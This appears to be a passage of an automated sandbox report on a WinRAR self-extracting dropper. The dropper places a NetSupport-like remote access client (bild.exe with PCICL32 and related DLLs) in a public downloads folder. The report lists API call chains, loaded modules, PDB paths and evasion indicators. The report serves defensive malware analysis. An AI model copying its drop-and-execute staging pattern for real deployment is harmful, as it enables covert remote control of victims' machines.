                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_110295901_2_11029590
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_11061C901_2_11061C90
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_110330101_2_11033010
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_111632201_2_11163220
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_111674851_2_11167485
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_110454F01_2_110454F0
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_1101B7601_2_1101B760
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_111258B01_2_111258B0
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_1101BBA01_2_1101BBA0
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_11087C601_2_11087C60
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_110700901_2_11070090
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_110804801_2_11080480
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_1115E9801_2_1115E980
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_1101C9C01_2_1101C9C0
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_110088AB1_2_110088AB
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_11050D801_2_11050D80
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_6C75A9801_2_6C75A980
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_6C783DB81_2_6C783DB8
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_6C7838A31_2_6C7838A3
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_6C7839231_2_6C783923
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_6C7849101_2_6C784910
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_6C75DBA01_2_6C75DBA0
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_6C7684F01_2_6C7684F0
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_6C7845281_2_6C784528
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_6C7517601_2_6C751760
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_6C78A0631_2_6C78A063
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_6C7841561_2_6C784156
                                Source: C:\Users\Public\Downloads\bild.exeProcess token adjusted: SecurityJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeCode function: String function: 11146450 appears 599 times
                                Source: C:\Users\Public\Downloads\bild.exeCode function: String function: 6C7530A0 appears 46 times
                                Source: C:\Users\Public\Downloads\bild.exeCode function: String function: 110278E0 appears 47 times
                                Source: C:\Users\Public\Downloads\bild.exeCode function: String function: 6C767D00 appears 116 times
                                Source: C:\Users\Public\Downloads\bild.exeCode function: String function: 6C756F50 appears 150 times
                                Source: C:\Users\Public\Downloads\bild.exeCode function: String function: 1116F010 appears 37 times
                                Source: C:\Users\Public\Downloads\bild.exeCode function: String function: 11029450 appears 992 times
                                Source: C:\Users\Public\Downloads\bild.exeCode function: String function: 111603E3 appears 41 times
                                Source: C:\Users\Public\Downloads\bild.exeCode function: String function: 6C767A90 appears 45 times
                                Source: C:\Users\Public\Downloads\bild.exeCode function: String function: 1105DD10 appears 289 times
                                Source: C:\Users\Public\Downloads\bild.exeCode function: String function: 11081BB0 appears 42 times
                                Source: C:\Users\Public\Downloads\bild.exeCode function: String function: 6C767C70 appears 35 times
                                Source: C:\Users\Public\Downloads\bild.exeCode function: String function: 11164010 appears 32 times
                                Source: C:\Users\Public\Downloads\bild.exeCode function: String function: 6C779480 appears 49 times
                                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00A0CDF0 appears 37 times
                                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00A0CEC0 appears 53 times
                                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00A0D870 appears 31 times
                                Source: file.exe, 00000000.00000003.1663707824.000000000506E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepcicl32.dll2 vs file.exe
                                Source: file.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclient32.exe. vs file.exe
                                Source: file.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametcctl32.dll2 vs file.exe
                                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: classification engineClassification label: mal88.rans.evad.winEXE@3/12@1/2
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_11059C50 GetLastError,FormatMessageA,LocalFree,1_2_11059C50
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,1_2_1109D440
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_1109D4D0 AdjustTokenPrivileges,CloseHandle,1_2_1109D4D0
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_11115B70 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize,1_2_11115B70
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A08BD0 FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00A08BD0
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,1_2_11127E10
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Downloads\__tmp_rar_sfx_access_check_5997468Jump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeMutant created: NULL
                                Source: C:\Users\user\Desktop\file.exeCommand line argument: sfxname0_2_00A0C131
                                Source: C:\Users\user\Desktop\file.exeCommand line argument: sfxstime0_2_00A0C131
                                Source: C:\Users\user\Desktop\file.exeCommand line argument: STARTDLG0_2_00A0C131
                                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\win.iniJump to behavior
                                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: file.exeReversingLabs: Detection: 50%
                                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\Public\Downloads\bild.exe "C:\Users\Public\Downloads\bild.exe"
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\Public\Downloads\bild.exe "C:\Users\Public\Downloads\bild.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: dxgidebug.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: dbgcore.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: pcihooks.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: riched32.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: pciinv.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                Source: C:\Users\user\Desktop\file.exeFile written: C:\Users\Public\Downloads\client32.iniJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: file.exeStatic file information: File size 2137945 > 1048576
                                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\Public\Downloads\msvcr100.dllJump to behavior
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: file.exe
                                Source: Binary string: msvcr100.i386.pdb source: bild.exe, bild.exe, 00000001.00000002.3511237810.000000006C941000.00000020.00000001.01000000.0000000D.sdmp, msvcr100.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: bild.exe, 00000001.00000002.3511448274.000000006CA22000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: file.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: bild.exe, 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: file.exe, 00000000.00000003.1663707824.0000000004D4E000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000000.1666036569.0000000000F22000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000001.00000002.3509963877.0000000000F22000.00000002.00000001.01000000.00000009.sdmp, bild.exe.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: file.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: bild.exe, 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: file.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: bild.exe, 00000001.00000002.3511372115.000000006CA05000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,HttpSendRequestA,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,1_2_11029590
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Downloads\__tmp_rar_sfx_access_check_5997468Jump to behavior
                                Source: PCICL32.DLL.0.drStatic PE information: section name: .hhshare
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0D8B6 push ecx; ret 0_2_00A0D8C9
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0CDF0 push eax; ret 0_2_00A0CE0E
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_1116F055 push ecx; ret 1_2_1116F068
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_11169F49 push ecx; ret 1_2_11169F5C
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_11040E01 push 3BFFFFFEh; ret 1_2_11040E06
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_6C786BBF push ecx; ret 1_2_6C786BD2
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_6C7794C5 push ecx; ret 1_2_6C7794D8
                                Source: msvcr100.dll.0.drStatic PE information: section name: .text entropy: 6.909044922675825
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Downloads\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Downloads\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Downloads\bild.exeJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Downloads\msvcr100.dllJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Downloads\pcicapi.dllJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Downloads\PCICL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Downloads\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Downloads\PCICHEK.DLLJump to dropped file
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_6C767030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,1_2_6C767030
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_6C755490 GetPrivateProfileIntA,1_2_6C755490
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_6C7550E0 CreateFileA,wsprintfA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,1_2_6C7550E0
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_6C755117 GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,1_2_6C755117
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,1_2_11127E10
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,1_2_11139090
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,1_2_1115B1D0
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,1_2_11113290
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,1_2_110CB2B0
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,1_2_110CB2B0
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,1_2_110254A0
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,1_2_110258F0
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,1_2_11023BA0
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,1_2_11024280
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_11112670 IsIconic,GetTickCount,1_2_11112670
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,1_2_111229D0
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,1_2_111229D0
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,1_2_110C0BB0
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,1_2_1115ADD0
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,1_2_1115ADD0
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_11143570 GetTickCount,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_11143570
                                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                Malware Analysis System Evasion

                                barindex
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_6C7591F01_2_6C7591F0
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_6C764F301_2_6C764F30
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_110B8200 Sleep,ExitProcess,1_2_110B8200
                                Source: C:\Users\Public\Downloads\bild.exeWindow / User API: threadDelayed 4576Jump to behavior
